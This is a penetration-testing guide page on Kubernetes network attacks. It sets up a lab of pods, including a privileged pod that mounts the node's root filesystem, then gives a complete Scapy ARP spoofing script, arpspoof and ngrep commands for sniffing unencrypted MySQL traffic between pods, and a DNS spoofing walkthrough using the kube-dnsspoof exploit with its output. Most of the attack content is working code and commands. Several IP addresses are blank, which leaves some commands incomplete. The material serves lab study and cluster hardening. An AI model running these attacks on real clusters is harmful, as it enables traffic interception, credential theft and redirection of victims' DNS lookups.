# Kubernetes Network Attacks
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## Introduction Kubernetes by default **connects** all the **containers running in the same node** (even if they belong to different namespaces) down to **Layer 2** (ethernet). This allows a malicious containers to perform an [**ARP spoofing attack**](../../generic-methodologies-and-resources/pentesting-network/#arp-spoofing) to the containers on the same node and capture their traffic. In the scenario 4 machines are going to be created: * ubuntu-pe: Privileged machine to escape to the node and check metrics (not needed for the attack) * **ubuntu-attack**: **Malicious** container in default namespace * **ubuntu-victim**: **Victim** machine in kube-system namespace * **mysql**: **Victim** machine in default namespace ```yaml echo 'apiVersion: v1 kind: Pod metadata: name: ubuntu-pe spec: containers: - image: ubuntu command: - "sleep" - "360000" imagePullPolicy: IfNotPresent name: ubuntu-pe securityContext: allowPrivilegeEscalation: true privileged: true runAsUser: 0 volumeMounts: - mountPath: /host name: host-volume restartPolicy: Never hostIPC: true hostNetwork: true hostPID: true volumes: - name: host-volume hostPath: path: / --- apiVersion: v1 kind: Pod metadata: name: ubuntu-attack labels: app: ubuntu spec: containers: - image: ubuntu command: - "sleep" - "360000" imagePullPolicy: IfNotPresent name: ubuntu-attack restartPolicy: Never --- apiVersion: v1 kind: Pod metadata: name: ubuntu-victim namespace: kube-system spec: containers: - image: ubuntu command: - "sleep" - "360000" imagePullPolicy: IfNotPresent name: ubuntu-victim restartPolicy: Never --- apiVersion: v1 kind: Pod metadata: name: mysql spec: containers: - image: mysql:5.6 ports: - containerPort: 3306 imagePullPolicy: IfNotPresent name: mysql env: - name: MYSQL_ROOT_PASSWORD value: mysql restartPolicy: Never' | kubectl apply -f - ``` ```bash kubectl exec -it ubuntu-attack -- bash -c "apt update; apt install -y net-tools python3-pip python3 ngrep nano dnsutils; pip3 install scapy; bash" kubectl exec -it ubuntu-victim -n kube-system -- bash -c "apt update; apt install -y net-tools curl netcat mysql-client; bash" kubectl exec -it mysql bash -- bash -c "apt update; apt install -y net-tools; bash" ``` ## Basic Kubernetes Networking If you want more details about the networking topics introduced here, go to the references. ### ARP Generally speaking, **pod-to-pod networking inside the node** is available via a **bridge** that connects all pods. This bridge is called “**cbr0**”. (Some network plugins will install their own bridge.) The **cbr0 can also handle ARP** (Address Resolution Protocol) resolution. When an incoming packet arrives at cbr0, it can resolve the destination MAC address using ARP. ![](<../../.gitbook/assets/image (637) (1).png>) This fact implies that, by default, **every pod running in the same node** is going to be able to **communicate** with any other pod in the same node (independently of the namespace) at ethernet level (layer 2). {% hint style="warning" %} Therefore, it's possible to perform A**RP Spoofing attacks between pods in the same node.** {% endhint %} ### DNS In kubernetes environments you will usually find 1 (or more) **DNS services running** usually in the kube-system namespace: ```bash kubectl -n kube-system describe services Name: kube-dns Namespace: kube-system Labels: k8s-app=kube-dns kubernetes.io/cluster-service=true kubernetes.io/name=KubeDNS Annotations: prometheus.io/port: 9153 prometheus.io/scrape: true Selector: k8s-app=kube-dns Type: ClusterIP IP Families: IP: IPs: Port: dns 53/UDP TargetPort: 53/UDP Endpoints: Port: dns-tcp 53/TCP TargetPort: 53/TCP Endpoints: Port: metrics 9153/TCP TargetPort: 9153/TCP Endpoints: ``` In the previous info you can see something interesting, the **IP of the service** is **** but the **IP of the pod** running the service is **** If you check the DNS address inside any pod you will find something like this: ``` cat /etc/resolv.conf nameserver ``` However, the pod **doesn't know** how to get to that **address** because the **pod range** in this case is Therefore, the pod will send the **DNS requests to the address** which will be **translated** by the cbr0 **to** ****. {% hint style="warning" %} This means that a **DNS request** of a pod is **always** going to go the **bridge** to **translate** the **service IP to the endpoint IP**, even if the DNS server is in the same subnetwork as the pod. Knowing this, and knowing **ARP attacks are possible**, a **pod** in a node is going to be able to **intercept the traffic** between **each pod** in the **subnetwork** and the **bridge** and **modify** the **DNS responses** from the DNS server (**DNS Spoofing**). Moreover, if the **DNS server** is in the **same node as the attacker**, the attacker can **intercept all the DNS request** of any pod in the cluster (between the DNS server and the bridge) and modify the responses. {% endhint %} ## ARP Spoofing in pods in the same Node Our goal is to **steal at least the communication from the ubuntu-victim to the mysql**. ### Scapy ```bash python3 /tmp/arp_spoof.py Enter Target IP: #ubuntu-victim Enter Gateway IP: #mysql Target MAC 02:42:ac:11:00:0a Gateway MAC: 02:42:ac:11:00:09 Sending spoofed ARP responses # Get another shell kubectl exec -it ubuntu-attack -- bash ngrep -d eth0 # Login from ubuntu-victim and mysql and check the unencrypted communication # interacting with the mysql instance ``` {% code title="arp_spoof.py" %} ```python #From https://gist.github.com/rbn15/bc054f9a84489dbdfc35d333e3d63c87#file-arpspoofer-py from scapy.all import * def getmac(targetip): arppacket= Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(op=1, pdst=targetip) targetmac= srp(arppacket, timeout=2 , verbose= False)[0][0][1].hwsrc return targetmac def spoofarpcache(targetip, targetmac, sourceip): spoofed= ARP(op=2 , pdst=targetip, psrc=sourceip, hwdst= targetmac) send(spoofed, verbose= False) def restorearp(targetip, targetmac, sourceip, sourcemac): packet= ARP(op=2 , hwsrc=sourcemac , psrc= sourceip, hwdst= targetmac , pdst= targetip) send(packet, verbose=False) print("ARP Table restored to normal for", targetip) def main(): targetip= input("Enter Target IP:") gatewayip= input("Enter Gateway IP:") try: targetmac= getmac(targetip) print("Target MAC", targetmac) except: print("Target machine did not respond to ARP broadcast") quit() try: gatewaymac= getmac(gatewayip) print("Gateway MAC:", gatewaymac) except: print("Gateway is unreachable") quit() try: print("Sending spoofed ARP responses") while True: spoofarpcache(targetip, targetmac, gatewayip) spoofarpcache(gatewayip, gatewaymac, targetip) except KeyboardInterrupt: print("ARP spoofing stopped") restorearp(gatewayip, gatewaymac, targetip, targetmac) restorearp(targetip, targetmac, gatewayip, gatewaymac) quit() if __name__=="__main__": main() # To enable IP forwarding: echo 1 > /proc/sys/net/ipv4/ip_forward ``` {% endcode %} ### ARPSpoof ```bash apt install dsniff arpspoof -t ``` ## DNS Spoofing As it was already mentioned, if you **compromise a pod in the same node of the DNS server pod**, you can **MitM** with **ARPSpoofing** the **bridge and the DNS** pod and **modify all the DNS responses**. You have a really nice **tool** and **tutorial** to test this in [**https://github.com/danielsagi/kube-dnsspoof/**](https://github.com/danielsagi/kube-dnsspoof/) In our scenario, **download** the **tool** in the attacker pod and create a \*\*file named `hosts` \*\* with the **domains** you want to **spoof** like: ``` cat hosts google.com. ``` Perform the attack to the ubuntu-victim machine: ``` python3 exploit.py --direct [*] starting attack on direct mode to pod Bridge: 02:42:bd:63:07:8d Kube-dns: 02:42:ac:11:00:02 [+] Taking over DNS requests from kube-dns. press Ctrl+C to stop ``` ```bash #In the ubuntu machine dig google.com [...] ;; ANSWER SECTION: google.com. 1 IN A ``` {% hint style="info" %} If you try to create your own DNS spoofing script, if you **just modify the the DNS response** that is **not** going to **work**, because the **response** is going to have a **src IP** the IP address of the **malicious** **pod** and **won't** be **accepted**.\ You need to generate a **new DNS packet** with the **src IP** of the **DNS** where the victim send the DNS request (which is something like, not, thats the K8s DNS service IP and not the DNS server ip, more about this in the introduction). {% endhint %} ## References * [https://www.cyberark.com/resources/threat-research-blog/attacking-kubernetes-clusters-through-your-network-plumbing-part-1](https://www.cyberark.com/resources/threat-research-blog/attacking-kubernetes-clusters-through-your-network-plumbing-part-1) * [https://blog.aquasec.com/dns-spoofing-kubernetes-clusters](https://blog.aquasec.com/dns-spoofing-kubernetes-clusters)
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